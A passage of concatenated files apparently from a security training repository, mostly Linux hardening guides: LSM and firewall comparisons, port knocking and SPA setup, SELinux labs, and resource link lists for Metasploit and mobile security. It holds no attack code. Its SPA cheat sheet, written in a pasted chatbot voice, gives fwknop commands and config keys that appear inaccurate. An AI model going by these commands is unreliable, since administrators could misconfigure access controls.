2 (with ECS-Optimized AMI)**: This is a Linux server provided by Amazon for use in the AWS environment. It is tuned for optimal performance and can be used with the Elastic Container Service (ECS) for container deployment. 7. **Ubuntu Core**: Ubuntu Core, built by Canonical, is a minimal version of Ubuntu designed for IoT devices and large container deployments. It uses a transactional update mechanism that makes it well-suited for devices and distributed applications on Linux. 8. **Photon OS**: VMware’s Photon OS is a lightweight, container-optimized Linux operating system designed for cloud-native applications, cloud platforms, and VMware infrastructure. Note that when choosing a container-optimized OS, you should consider factors such as the specific needs of your project, hardware requirements, the cloud platform you're using (if any), and your familiarity with the OS.
Markdown
h4cker/linux-hardening/LSM-comparison.md
# A Comparative Overview of SELinux, AppArmor, Yama, TOMOYO Linux, and Smack Introduction: In the realm of Linux security, various Linux Security Modules (LSMs) have been developed to enhance access control and provide mandatory access control (MAC) mechanisms. This article explores five popular LSMs: SELinux, AppArmor, Yama, TOMOYO Linux, and Smack. Each of these modules offers unique features and approaches to bolstering the security posture of Linux-based systems. 1. SELinux: - Developed by the National Security Agency (NSA), SELinux is widely adopted in mainstream RHEL-based distributions. - Implements MAC with fine-grained access controls, allowing administrators to define extensive security policies. - Enforces access controls based on security labels, providing powerful isolation and protection against privilege escalation. - Requires a specific kernel build with SELinux support, and policies can be complex to configure and manage. - Documentation: [SELinux Project](https://github.com/SELinuxProject/selinux/wiki) 2. AppArmor: - AppArmor is integrated into mainstream Ubuntu-based distributions and provides profile-based access control. - Offers pre-configured profiles for commonly used applications, simplifying the setup and management of security policies. - Uses path-based access control to restrict access to files and resources, enhancing application-level security. - Provides a balance between security and usability, making it more approachable for many users. - Documentation: [AppArmor Wiki](https://gitlab.com/apparmor/apparmor/-/wikis/home) 3. Yama: - Yama focuses on process-related security features, allowing fine-grained restrictions on process operations. - It enables administrators to limit process tracing, prevent process attachment, and restrict process capabilities. - Available in some mainstream distributions such as Fedora, Yama provides additional process-level security controls. - Documentation: [Yama Documentation](https://www.kernel.org/doc/html/latest/admin-guide/Yama.html) 4. TOMOYO Linux: - TOMOYO Linux employs a lightweight and pathname-based access control mechanism. - Administrators define policies based on paths, executables, and attributes, reducing complexity. - Offers a white-listing approach to security, allowing only explicitly permitted operations and enhancing security through simplicity. - Limited usage compared to SELinux and AppArmor, typically found in specific distributions and niche use cases. - Documentation: [TOMOYO Linux Documentation](https://tomoyo.osdn.jp/2.5/policy-specification/index.html) 5. Smack: - Smack, a lightweight labeling-based access control LSM, focuses on simplicity and flexibility. - Uses security labels assigned to processes and files to enforce access control policies. - Smack's labeling approach enables fine-grained access control, enhancing security in a lightweight manner. - Not included by default in mainstream distributions but can be enabled with a specific kernel build. - Documentation: [Smack Documentation](https://schaufler-ca.com/documentation/smack/) Conclusion: LSMs play a vital role in enhancing Linux system security. SELinux, AppArmor, Yama, TOMOYO Linux, and Smack are prominent examples, each offering distinct features and approaches to access control. When selecting an LSM, it is crucial to consider the specific requirements, complexity, and community support to ensure an optimal security solution for your Linux environment. Consult the provided documentation for each LSM to gain a deeper understanding of their features and configuration options. ## Comparison Table | Feature | SELinux | AppArmor | Yama | TOMOYO Linux | Smack | |-------------------------|----------------------------------------------------|----------------------------------------------------|-----------------------------------------------------|----------------------------------------------------|----------------------------------------------------| | Purpose | Mandatory Access Control (MAC) | Profile-based Access Control | Process-related security | Lightweight, pathname-based Access Control | Lightweight, labeling-based Access Control | | Development | National Security Agency (NSA) | Open-source community | Community-driven | Community-driven | Community-driven | | Default Inclusion | Mainstream RHEL-based distributions (e.g., CentOS) | Mainstream Ubuntu-based distributions | Some mainstream distributions (e.g., Fedora) | Not included by default | Not included by default | | Access Control Approach | MAC - Flexible and fine-grained access controls | Profile-based - Pre-configured profiles for apps | Process-related - Attach/trace restrictions | Pathname-based - Path-based access control | Labeling-based - Security labels for processes/files | | Complexity | Higher complexity due to fine-grained control | Moderate complexity with pre-configured profiles | Simpler process-related restrictions | Moderate complexity with pathname-based policies | Simpler labeling-based access control | | Usage | Commonly used in RHEL-based enterprise systems | Commonly used in Ubuntu-based distributions | Limited usage, primarily process-related security | Limited usage, specific distributions and use cases | Limited usage, specific distributions and use cases | | Integration | Requires specific kernel build with SELinux support | Included by default in Ubuntu and some distributions | Included in some mainstream distributions | Requires specific kernel build with TOMOYO support | Requires specific kernel build with Smack support | Please note that the features and usage mentioned in the table are general characteristics, and specific implementations and configurations may vary. The choice between these LSMs depends on factors such as the Linux distribution, security requirements, and specific use case considerations. It's important to evaluate each LSM's documentation and community support to determine the best fit for your needs.
Markdown
h4cker/linux-hardening/nftables_iptables_ufw_firewalld.md
# iptables, nftables, UFW, and firewalld The following is comparison table highlighting the features and characteristics of iptables, nftables, UFW (Uncomplicated Firewall), and firewalld: | Feature | iptables | nftables | UFW | firewalld | |--------------------|------------------------------------------------|-----------------------------------------------|----------------------------------------------------|----------------------------------------------------| | Framework | Legacy framework | Modern framework | User-friendly wrapper for iptables | Dynamic firewall management tool | | Syntax | Complex syntax | Simplified syntax | Simplified syntax | XML-based configuration files | | Rule Evaluation | Top-down order | Ordered by priority | Top-down order | Dynamic and transaction-based | | Protocol Support | IPv4 and IPv6 | IPv4 and IPv6 | IPv4 and IPv6 | IPv4 and IPv6 | | Rule Matching | Basic matching options | Extended matching options | Basic matching options | Extended matching options | | Performance | Good | Better performance than iptables | Good | Good | | Network Address Translation (NAT) | Yes | Yes | Yes | Yes | | Connection Tracking| Yes | Yes | No | Yes | | Integration | Compatible with nftables (with compatibility modules) | Replaced iptables and ip6tables | N/A | Replaced iptables | | User Interface | Command-line interface (CLI) | Command-line interface (CLI) | Command-line interface (CLI) and graphical interface | Command-line interface (CLI) and graphical interface | | Firewall Zones | N/A | N/A | N/A | Yes | | Easy Configuration | Requires detailed rule configuration | Simplified rule configuration | Simplified rule configuration | Simplified rule configuration | | Default on Distro | Most Linux distributions | Some Linux distributions | Ubuntu, Debian, and their derivatives | CentOS, Fedora, RHEL, and their derivatives | This table provides a general overview of the features and characteristics of each firewall tool, and the specific details may vary based on the Linux distribution, version, and configuration.
Markdown
h4cker/linux-hardening/port-knocking-and-spa.md
# Port Knocking and Single Packet Authorization (SPA) Port Knocking is a technique used to secure network services by adding an extra layer of protection to the system's firewall. It involves a series of connection attempts to predefined closed ports in a particular sequence or pattern. Only after the correct sequence of connection attempts (knocks) is made, the firewall dynamically opens the desired port or ports, allowing access to the protected service. The basic idea behind Port Knocking is that the system's ports are initially closed, making them invisible to potential attackers. To gain access, a user or client must send connection attempts (knocks) to a specific sequence of closed ports, which acts as a secret "knock code." Once the correct sequence is detected by the Port Knocking daemon, the firewall rules are dynamically modified to permit access to the requested service. Port Knocking offers an additional layer of security by hiding services and making them accessible only to those who know the correct knock sequence. It can provide protection against port scanning, automated attacks, and unauthorized access attempts. As the knocking sequence is typically predefined and known only to authorized users, it adds an extra level of obscurity to the system. However, it's important to note that Port Knocking should not be considered a standalone security measure. It is typically used in combination with other security measures like strong authentication, encryption, and proper firewall configurations to create a more robust defense for network services. It's worth mentioning that Port Knocking has evolved over time, and alternative techniques like Single Packet Authorization (SPA) have been developed to address some limitations and potential weaknesses associated with traditional Port Knocking implementations. ## Setting Up Port Knocking To set up Port Knocking in Linux, you can follow these steps: 1. Install the necessary packages: Ensure that the required packages for Port Knocking are installed on your Linux system. The most common package used is `knockd`. 2. Configure the firewall: Set up the firewall rules to block access to the desired ports initially. For example, you can use iptables or firewalld to deny incoming connections to the ports you want to protect. 3. Configure knockd: Edit the `knockd` configuration file located at `/etc/knockd.conf` to define the Port Knocking sequence. Specify the sequence of ports that need to be "knocked" and the action to be performed once the correct sequence is received. An example `knockd.conf` configuration could look like this: ``` [options] logfile = /var/log/knockd.log [opencloseSSH] sequence = 1234,5678,9876 seq_timeout = 10 start_command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT cmd_timeout = 10 stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT ``` In this example, the Port Knocking sequence is 1234, 5678, 9876, and when received, it opens port 22 for SSH connections. 4. Start the knockd service: Start the `knockd` service to activate the Port Knocking configuration. The command to start the service depends on your Linux distribution. For example: ``` sudo systemctl start knockd # For systemd-based systems ``` 5. Test the Port Knocking setup: From a remote system, use a tool like `nmap` or `knock` to send the specified sequence of packets to the required ports. For example, using `knock`: ``` knock <server_IP> 1234 5678 9876 ``` If the correct sequence is received within the defined timeout period, the firewall will open the specified port, allowing access for the desired service. 6. Adjust logging and security: Customize the logging options in the `knockd` configuration to suit your needs. Additionally, ensure that you have appropriate security measures in place, such as strong authentication and IP restrictions, to further protect your system. Remember to adjust the configuration based on your specific requirements and Linux distribution. Consult the official documentation for `knockd` and your firewall management tool for detailed instructions and additional options. ## Single Packet Authorization (SPA) Single Packet Authorization (SPA) is an advanced security technique that provides a secure and efficient method for accessing network services. It is an evolution of the traditional Port Knocking concept and offers enhanced security and flexibility. In SPA, instead of requiring a predefined sequence of connection attempts like in Port Knocking, a single encrypted and authenticated packet, referred to as the "SPA packet," is sent to the system to authorize access to a specific service or resource. Here's a general overview of how SPA works: 1. Generating the SPA packet: To initiate access, the client generates an SPA packet using a shared secret and other required parameters. The packet typically includes information such as the desired service, timestamp, source IP address, cryptographic signatures, and potentially additional authorization data. 2. Sending the SPA packet: The client sends the SPA packet to the target system through a network packet. This packet is typically sent to a closed or non-existent port to minimize detection. 3. Firewall rules and service access: When the target system receives the SPA packet, it verifies the authenticity and integrity of the packet using cryptographic signatures and shared secrets. If the packet is valid, the system dynamically modifies the firewall rules to permit access to the requested service or resource for a specified period. 4. Service access: With the firewall rules adjusted, the authorized client can now connect to the desired service or resource within the allowed timeframe. The system typically uses port forwarding or other mechanisms to redirect incoming traffic to the authorized service. SPA provides several advantages over traditional Port Knocking: - Enhanced security: SPA relies on strong cryptographic techniques and authentication mechanisms, making it resistant to replay attacks, spoofing, and tampering attempts. - Flexibility: SPA allows fine-grained access control to specific services or resources, granting access only to authorized clients for a limited time window. - Reduced network traffic: As SPA involves sending only a single packet, it reduces the amount of network traffic compared to traditional Port Knocking, which requires a sequence of connection attempts. - Auditability: SPA enables detailed logging and auditing capabilities since every access attempt is associated with a specific packet and cryptographic signatures. SPA is a powerful technique for securing network services, especially when combined with other security measures like strong authentication, encryption, and proper firewall configurations. It provides an additional layer of protection against unauthorized access attempts and strengthens the overall security posture of the system. ## Setting Up SPA Configuring Single Packet Authorization (SPA) in Ubuntu involves using a combination of tools to implement the technique. Here's a general outline of the steps involved: 1. Install the necessary packages: Begin by installing the required software packages. SPA can be implemented using tools such as fwknop (FireWall KNock OPerator) for SPA packet generation and handling, and the appropriate firewall management tool (e.g., iptables or ufw). 2. Configure the firewall: Set up your firewall rules to restrict access to the desired service or services. By default, deny incoming connections to those services. You can use iptables or ufw to define the initial firewall rules. 3. Install and configure fwknop: Install fwknop on your Ubuntu system. The specific installation steps may vary depending on the Ubuntu version and package availability. Once installed, configure fwknop by editing the `/etc/fwknop/fwknop.conf` file. Customize the configuration options according to your needs, including defining the SPA access policies and shared secrets. 4. Generate the SPA packet: Use the `fwknop` command-line tool to generate an SPA packet. Specify the necessary parameters, such as the target IP address, access policy, and shared secret. This will create an encrypted and authenticated SPA packet. 5. Configure the firewall rules to open ports: Upon receiving a valid SPA packet, fwknop modifies the firewall rules to allow access to the specified service or services for a limited time window. Configure fwknop to work in conjunction with your firewall management tool (iptables or ufw) to dynamically open the required ports based on the received SPA packet. 6. Test the SPA setup: On a separate machine or network, attempt to send the SPA packet generated in Step 4 to the Ubuntu system's IP address. Ensure that the packet reaches the system and that the firewall rules are dynamically adjusted to permit access to the desired service or services. It's important to refer to the official documentation and resources for fwknop and your chosen firewall management tool for detailed instructions specific to your Ubuntu version. Also, consider security best practices, such as using strong authentication, securing the shared secrets, and regularly updating and monitoring your system. Note: The steps provided are a general overview, and the actual implementation may vary depending on your specific requirements and Ubuntu version. Certainly! Here are the links to the documentation for both Port Knocking and Single Packet Authorization (SPA): ### Port Knocking References: - "Port Knocking - Wikipedia article": Provides an overview of Port Knocking and its concepts. - Link: [Port Knocking - Wikipedia](https://en.wikipedia.org/wiki/Port_knocking) - "Port Knocking - ArchWiki": Offers detailed information and instructions on implementing Port Knocking in Linux, including example configurations. - Link: [Port Knocking - ArchWiki](https://wiki.archlinux.org/title/Port_knocking) ### Single Packet Authorization (SPA) References: - "fwknop: Single Packet Authorization (SPA) ": Offers detailed documentation on fwknop, a widely used SPA implementation. - Link: [fwknop: Single Packet Authorization (SPA) documentation](https://github.com/mrash/fwknop) Remember to refer to the official documentation, user guides, and community resources for the most accurate and up-to-date information on Port Knocking and SPA. These resources will provide more in-depth knowledge, configuration examples, and troubleshooting tips specific to each technique. ## My SPA Cheat Sheet Certainly! Here's a cheat sheet for Single Packet Authorization (SPA): 1. Install fwknop: - Ubuntu/Debian: `sudo apt-get install fwknop` 2. Configure fwknop: - Edit `/etc/fwknop/fwknop.conf`: - Set `ENABLE_RULES` to `Y`. - Define `FW_ACCESS_TIMEOUT` to specify the access window duration. - Configure `AUTH_MODE` and set the appropriate authentication mode. - Specify `KEY_BASE64` or `KEY_FILE` with the shared secret. - Customize other options as needed. 3. Generate SPA packet: - Run `fwknop --generate-key` to generate a new encryption key. - Use `fwknop --nmap <target_IP>` to generate an SPA packet for the target IP. - Copy the generated packet for future use. 4. Configure firewall rules: - Use iptables or ufw to define initial firewall rules. - Block incoming traffic to desired services: - `sudo iptables -A INPUT -p tcp --dport <port_number> -j DROP` 5. Configure firewall integration: - Edit `/etc/fwknop/access.conf`: - Specify the desired service name and port(s). - Define a SPA stanza with the correct access policy, such as `OPEN`. 6. Modify firewall rules with SPA packet: - Run `fwknop -R -p <SPA_packet>` to modify firewall rules dynamically. - Firewall rules are adjusted to allow access for the specified service(s). 7. Test SPA access: - From a separate network, send the SPA packet to the target IP. - Access should be granted to the specified service(s) during the access window. Remember to adjust the commands and paths based on your specific setup and Linux distribution. Consult the official **fwknop** documentation for detailed configuration options, advanced features, and troubleshooting tips. **Note**: This cheat sheet provides a general outline of the SPA setup process. It's recommended to refer to the official documentation and resources for **fwknop** and your chosen firewall management tool for more detailed instructions and advanced configurations.
Markdown
h4cker/linux-hardening/README.md
# Linux Hardening Tips The following are a few resources related to hardening Linux implementations. ## Linux Basics - [Null-byte Linux Basics](https://null-byte.wonderhowto.com/how-to/linux-basics/). - [Kali Linux Revealed Free Course](https://kali.training/) ### Cool Ways to Test Your Linux Knowledge - [Overthewire: Bandit](https://overthewire.org/wargames/bandit/) - [Tryhackme: Linux Modules](https://tryhackme.com/room/linuxmodules) ## Benchmarks and Hardening Guides - [CIS Benchmarks](https://www.cisecurity.org/cis-benchmarks/) - [DoD Security Technical Implementation Guides (STIGs)](https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=operating-systems) - [Quickly build STIG-compliant Amazon Machine Images using Amazon EC2 Image Builder](https://aws.amazon.com/blogs/security/quickly-build-stig-compliant-amazon-machine-images-using-amazon-ec2-image-builder/) - [How to Secure and Harden Cloud VM (Ubuntu & CentOS)?](https://geekflare.com/cloud-vm-security-guide/) - [How To Harden OpenSSH on Ubuntu 20.04](https://www.digitalocean.com/community/tutorials/how-to-harden-openssh-on-ubuntu-20-04) - [Digital Ocean Security Hardening and General Security Blog Posts](https://www.digitalocean.com/community/tags/security) ## Linux Security Modules - [SELinux](https://selinuxproject.org) - [AppArmor](https://apparmor.net/) - [Smack](https://en.wikipedia.org/wiki/Smack_(software)) - [Tomoyo Linux](https://en.wikipedia.org/wiki/Tomoyo_Linux) ## Additional Resources - [Linux Kernel Exploitation](https://github.com/xairy/linux-kernel-exploitation) - [The Linux Auditing Framework](https://github.com/linux-audit/audit-userspace) - [DevSec Linux Baseline](https://github.com/dev-sec/linux-baseline) - [Security Content Automation Protocol (SCAP)](https://www.open-scap.org/security-policies/) - [Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker)
Markdown
h4cker/linux-hardening/selinux_CENTOS_lab.md
# SELinux Lab Notes The following is based on contributions from the Linode Linux community. SELinux is a Mandatory Access Control (MAC) system, developed by the NSA. SELinux was developed as a replacement for Discretionary Access Control (DAC) that ships with most Linux distributions. The difference between DAC and MAC is *how* users and applications gain access to machines. Traditionally, the command `sudo` gives a user the ability to heighten permissions to root-level. Root access on a DAC system gives the person or program access to all programs and files on a system. A person with root access should be a trusted party. But if security has been compromised, so too has the system. SELinux and MACs resolve this issue by both confining privileged processes and automating security policy creation. SELinux defaults to denying anything that is not explicitly allowed. SELinux has two global modes, *permissive* and *enforcing*. Permissive mode allows the system to function like a DAC system, while logging every violation to SELinux. The enforcing mode applies a strict denial of access to anything that isn't explicitly allowed. To explicitly allow certain behavior on a machine, you, as the system administrator, have to write policies that allow it. This guide provides a brief and basic introduction to commonly used commands and practices for SELinux system administration. ## Before You Begin 1. This guide is written for a non-root user. Commands that require elevated privileges are prefixed with `sudo`. If you're not familiar with the `sudo` command, you can check our [Users and Groups](/docs/guides/linux-users-and-groups/) guide. 2. Update your system: ``` sudo yum update ``` ## Install Supporting SELinux Packages In this section, you will install various SELinux packages that will help you when creating, managing, and analyzing SELinux policies. 1. Verify which SELinux packages are installed on your system: ``` sudo rpm -aq | grep selinux ``` A newly deployed CentOS system should have the following packages installed: ``` libselinux-2.5-14.1.el7.x86_64 selinux-policy-3.13.1-252.el7_7.6.noarch selinux-policy-targeted-3.13.1-252.el7_7.6.noarch libselinux-utils-2.5-14.1.el7.x86_64 libselinux-python-2.5-14.1.el7.x86_64 ``` 1. Install the following packages and their associated dependencies: ``` sudo yum install policycoreutils policycoreutils-python setools setools-console setroubleshoot ``` - `policycoreuitls` and `policyoreutils-python` contain several management tools to administer your SELinux environment and policies. - `setools` provides command line tools for working with SELinux policies. Some of these tools include, `sediff` which you can use to view differences between policies, `seinfo` a tool to view information about the components that make up SELinux policies, and `sesearch` used to search through your SELinux policies. `setools-console` consists of `sediff`, `seinfo`, and `sesearch`. You can issue the `--help` option after any of the listed tools in order to view more information about each one. - `setroubleshoot` suite of tools help you determine why a script or file may be blocked by SELinux. Optionally, install `setroubleshoot-server` and `mctrans`. The `setroubleshoot-server` allows, among many other things, for email notifications to be sent from the server to notify you of any policy violations. The `mctrans` daemon translates SELinux's output to human readable text. ## SELinux States and Modes ### SELinux States When SELinux is installed on your system, it can be either *enabled* or *disabled*. - To disable SELinux, update your SELinux configuration file using the text editor of your choice. Set the `SELINUX` directive to `disabled` as shown in the example. Edit `/etc/selinux/config` ``` # This file controls the state of SELinux on the system. # SELINUX= can take one of these three values: # enforcing - SELinux security policy is enforced. # permissive - SELinux prints warnings instead of enforcing. # disabled - No SELinux policy is loaded. SELINUX=disabled # SELINUXTYPE= can take one of three values: # targeted - Targeted processes are protected, # minimum - Modification of targeted policy. Only selected processes are protected. # mls - Multi Level Security protection. SELINUXTYPE=targeted ``` - Reboot your system for the changes to take effect: ``` sudo reboot ``` - Connect to your host via SSH (replace `10.1.2.3` with your own address and verify your SELinux installation's status: ``` ssh omar@10.1.2.3 sudo sestatus ``` Its output should display `disabled` ``` SELinux status: disabled ``` ### SELinux Modes When SELinux is enabled, it can run in either *enforcing* or *permissive* modes. If SELinux is currently disabled, update your SELinux configuration file with the `SELINUX` directive set to `enabled`, then reboot your system, and SSH back into your system. These steps are outlined in the [SELinux States](#selinux-states) section of the guide. - In enforcing mode, SELinux enforces its policies on your system and denies access based on those policies. Use the following command to view SELinux policy modules currently loaded into memory: ``` sudo semodule -l ``` - Permissive mode does not enforce any of your SELinux policies, instead, it logs any actions that would have been denied to your `/var/log/audit/audit.log` file. - You can check which mode your system is running by issuing the following command: ``` sudo getenforce ``` - To place SELinux in permissive mode, use the following command: ``` sudo setenforce 0 ``` Permissive mode is useful when configuring your system, because you and your system's components can interact with your files, scripts, and programs without restriction. However, you can use audit logs and system messages to understand what would be restricted in enforcing mode. This will help you better construct the necessary policies for your system's user's and programs. - Use the `sealert` utility to generate a report from your audit log. The log will include information about what SELinux is preventing and how to allow the action, if desired. ``` sudo sealert -a /var/log/audit/audit.log ``` The output will resemble the example, however, it varies depending on the programs and configurations on your system. ``` SELinux is preventing `/usr/sbin/httpd` from write access on the directory logs. ``` If you want to allow httpd to have write access on the logs directory Then you need to change the label on 'logs' Do ``` # semanage fcontext -a -t httpd_sys_rw_content_t 'logs' # restorecon -v 'logs' ``` - To allow `/usr/sbin/httpd` write access to the directory logs, as shown by the output, you can execute the suggested commands, `semanage fcontext -a -t httpd_sys_rw_content_t 'logs'` and `restorecon -v 'logs'`. ## SELinux Context SELinux marks every single object on a machine with a *context*. Every file, user, and process has a context. The context is broken into three parts: *user*, *role*, and *type*. An SELinux policy controls which users can get which roles. Each specific role places a constraint on what type of files that user can access. When a user logs in to a system, a role is assigned to the user as seen in the `ls -Z` example, the output `unconfined_u` is a user role. 1. Create a directory in your home folder: ``` mkdir ~/example_dir ``` 1. Print the SELinux security context of your home folder's directories and files : ``` ls -Z ~/ ``` The output is similar to: ``` drwxrwxr-x. example_user example_user unconfined_u:object_r:user_home_t:s0 example_dir ``` The SELinux specific information is contained in the `unconfined_u:object_r:user_home_t:s0` portion, which follows the following syntax: `user:role:type:level`. To learn more about users, roles, and related access control, see the [CentOS SELinux documentation](https://wiki.centos.org/HowTos/SELinux). ## SELinux Boolean An SELinux Boolean is a variable that can be toggled on and off without needing to reload or recompile an SELinux policy. 1. You can view the list of Boolean variables using the `getsebool -a` command. Pipe the command through `grep` to narrow down your results. ``` sudo getsebool -a | grep "httpd_can" ``` You will see a similar output: ``` httpd_can_check_spam --> off httpd_can_connect_ftp --> off httpd_can_connect_ldap --> off httpd_can_connect_mythtv --> off httpd_can_connect_zabbix --> off httpd_can_network_connect --> off httpd_can_network_connect_cobbler --> off httpd_can_network_connect_db --> off httpd_can_network_memcache --> off httpd_can_network_relay --> off httpd_can_sendmail --> off ``` You can change the value of any variable using the `setsebool` command. If you set the `-P` flag, the setting will persist through reboots. If, for example, you want to allow HTTPD scripts and modules to connect to the network, update the corresponding boolean variable ``` sudo setsebool -P httpd_can_network_connect ON ``` When viewing a list of your boolean variables, you should now see that it is set to `ON`. ``` sudo getsebool -a | grep "httpd_can" ``` Output similar to: ``` httpd_can_check_spam --> off httpd_can_connect_ftp --> off httpd_can_connect_ldap --> off httpd_can_connect_mythtv --> off httpd_can_connect_zabbix --> off httpd_can_network_connect --> on httpd_can_network_connect_cobbler --> off httpd_can_network_connect_db --> off httpd_can_network_memcache --> off httpd_can_network_relay --> off httpd_can_sendmail --> off ``` ### Additional References Consult the following resources for additional information on this topic. While these are provided in the hope that they will be useful, please note that we cannot vouch for the accuracy or timeliness of externally hosted materials. - [Graphical Guide to Policies](https://opensource.com/business/13/11/selinux-policy-guide) - [SELinux User Resources](https://selinuxproject.org/page/User_Resources) - [CentOS SELinux Wiki](https://wiki.centos.org/HowTos/SELinux)
Markdown
h4cker/linux-hardening/selinux_UBUNTU_lab.md
# SELinux in Ubuntu Lab The following can be completed with Ubuntu 22.x or later. ## Installing and Enabling SELinux The first step is to install SELinux. Start by opening a command line terminal and installing the necessary packages with the apt commands below. ``` $sudo apt update $ sudo apt install policycoreutils selinux-utils selinux-basics ``` ### Activate SELinux Execute the following command with root permissions to enable SELinux on the system. ``` $ sudo selinux-activate ``` ## Enforcing Mode Set SELinux to enforcing mode: ``` $ sudo selinux-config-enforcing ``` Reboot your system. The relabelling will be triggered after you reboot your system. When finished the system will reboot one more time automatically. ``` $ reboot ``` Check SELinux status with the following command to ensure that it is in enforcing mode. $ sestatus ## Disabling SELinux To disable SELinux open up the `/etc/selinux/config` configuration file and change the following line: FROM: ``` SELINUX=enforcing ``` TO: ``` SELINUX=disabled ``` Reboot your system for the changes to take effect. Alternatively you can temporarily put SELinux into permissive mode with the following command. ``` $ sudo setenforce 0 ``` Note this change will not be persistent (i.e., survive a reboot). It will go back to enforcing later. To enable SELinux again just execute: ``` $ sudo setenforce 1 ```
Markdown
h4cker/linux-hardening/understanding_selinux.md
# Understanding and Using SELinux SELinux, or Security-Enhanced Linux, is an advanced access control mechanism integrated into the Linux kernel. Initially developed by the National Security Agency (NSA), it provides Mandatory Access Control (MAC) unlike traditional Unix/Linux access control which provides Discretionary Access Control (DAC). In this article, we will explore the basics of SELinux and how to use it effectively. **NOTE:** Check the out the two labs I have here: [CENTOS LAB](https://github.com/The-Art-of-Hacking/h4cker/blob/master/linux-hardening/selinux_CENTOS_lab.md) and [UBUNTU SELINUX LAB](https://github.com/The-Art-of-Hacking/h4cker/blob/master/linux-hardening/selinux_UBUNTU_lab.md). ## Introduction to SELinux SELinux adds another layer of access control, defining how/what a user process can access. It makes use of policies to enforce the rules that govern these permissions. It's designed to protect the integrity of the system, even when a process is compromised, by limiting potential damage. SELinux has three modes of operation: 1. **Enforcing:** SELinux policy is enforced. SELinux denies access based on SELinux policy rules. 2. **Permissive:** SELinux policy is not enforced. SELinux does not deny access, but denials are logged for actions that would have been denied if running in enforcing mode. 3. **Disabled:** SELinux is fully disabled. You can check the current status of SELinux by using the command: `sestatus` ## Working with SELinux To get started with SELinux, you need to understand its concepts of 'Types' and 'Contexts': - **Type Enforcement:** The primary mechanism of access control used in SELinux is Type Enforcement. Everything that acts upon or is acted upon in a system is assigned a type: files, directories, ports, and even processes have types. - **Security Contexts:** SELinux attaches a security context to every system object. This context includes information like SELinux user, role, type, and, optionally, security level. You can view the security context of a file or process using `-Z` option with `ls` or `ps` command respectively. For example, to view the context of files in a directory: ```bash ls -Z /var/www/html ``` To view the context of running processes: ```bash ps -efZ ``` ## Managing SELinux Policies The true power of SELinux comes from its fine-grained control over system objects, achieved through SELinux policies. These policies are the rules that the SELinux system uses to allow or disallow actions. For example, if you have an application that requires access to a non-standard port, you can create or modify a SELinux policy to allow this access. The `semanage` command is a powerful tool for this: ```bash semanage port -a -t http_port_t -p tcp 8080 ``` In the above command, `-a` is to add a port, `-t` is to define the type, `-p` to define the protocol, and `8080` is the port number. ## Managing SELinux Modes As mentioned earlier, SELinux has three modes of operation. To switch between these modes, you use the `setenforce` command: ```bash setenforce 0 # Sets SELinux to Permissive mode setenforce 1 # Sets SELinux to Enforcing mode ``` To make these changes persistent across reboots, modify the `SELINUX=` line in the `/etc/selinux/config` file. ## Handling SELinux Denials When SELinux blocks an action, it generates a denial message that is logged to the `/var/log/audit/audit.log` file. The `audit2why` utility can help you understand why the action was denied: ```bash audit2why -al ``` If a particular denial isn't in line with your system needs, you can create a custom SELinux policy module to allow the previously denied action using the `audit2allow` utility. Again, check the out the two labs I have here: [CENTOS LAB](https://github.com/The-Art-of-Hacking/h4cker/blob/master/linux-hardening/selinux_CENTOS_lab.md) and [UBUNTU SELINUX LAB](https://github.com/The-Art-of-Hacking/h4cker/blob/master/linux-hardening/selinux_UBUNTU_lab.md).
Markdown
h4cker/metasploit_resources/README.md
# Metasploit Resources * [Offensive Security Metasploit Unleashed Free Course](https://www.offensive-security.com/metasploit-unleashed/) - a free course from the folks at Offensive Security created to help raise awareness for underprivileged children in East Africa. Please make a donation to the Hackers For Charity non-profit 501(c)(3) organization. A sum of $9.00 will feed a child for a month, so any contribution makes a difference. * Don't forget to always update Metasploit - `msfupdate` * [A Good Summary of Metasploit Commands](https://www.hackingtutorials.org/metasploit-tutorials/metasploit-commands/)
JSON
h4cker/mobile_security/output.json
[ { "outputType": { "type": "APK" }, "apkInfo": { "type": "MAIN", "splits": [ ], "versionCode": 1, "versionName": "1.0", "enabled": true, "outputFile": "app-release.apk", "fullName": "release", "baseName": "release" }, "path": "app-release.apk", "properties": { } } ]
Markdown
h4cker/mobile_security/README.md
# Mobile Device Security The following are several of the resources covered in the [Art of Hacking Series LiveLessons](https://theartofhacking.org), [Safari Live Training](https://www.safaribooksonline.com/search/?query=ethical%20hacking%20omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=live%20online%20training&sort=relevance), and [penetration testing books authored by Omar Santos](https://omarsantos.io). ## OWASP Resources - [OWASP Mobile Security Project](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Home) - [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Top_10_Mobile_Risks) - [OWASP Mobile Security Testing Guide](https://b-mueller.gitbooks.io/the-owasp-mobile-security-testing-guide/content) - [OWASP Mobile Application Security Verification Standard (MASVS)](https://www.owasp.org/images/6/61/MASVS_v0.9.4.pdf) - [OWASP MThreat Model Project](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=M-Threat_Model_Project) ## Android - [Android Developer Studio](http://developer.android.com/sdk/index.html) - [APKtool](http://ibotpeaches.github.io/Apktool/) - [dex2jar](https://github.com/pxb1988/dex2jar) - [Bytecode Viewer](https://bytecodeviewer.com/) - [IDA Pro](https://www.hex-rays.com/products/ida/index.shtml) - [Android Reverse Engineering Arsenals](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=M-Tools) ### Dex2jar and JD-GUI Dex2jar and JD-GUI are two different tools that are often used for reverse engineering Android apps. Dex2jar converts .dex files to .jar. JD-GUI is a Java decompiler that can decompile .jar files to the original Java source. * http://sourceforge.net/projects/dex2jar/ * http://jd.benow.ca ## Apple iOS - [Damn Vulnerable iOS Application (DVIA)](https://www.owasp.org/index.php/OWASP_DVIA) - [DVIA Github Source](https://github.com/prateek147/DVIA) - [DVIA Learning Resources](http://damnvulnerableiosapp.com/#learn)
h4cker/mobile_security/OmarsApplication/.gitignore
*.iml .gradle /local.properties /.idea/libraries /.idea/modules.xml /.idea/workspace.xml .DS_Store /build /captures .externalNativeBuild
h4cker/mobile_security/OmarsApplication/build.gradle
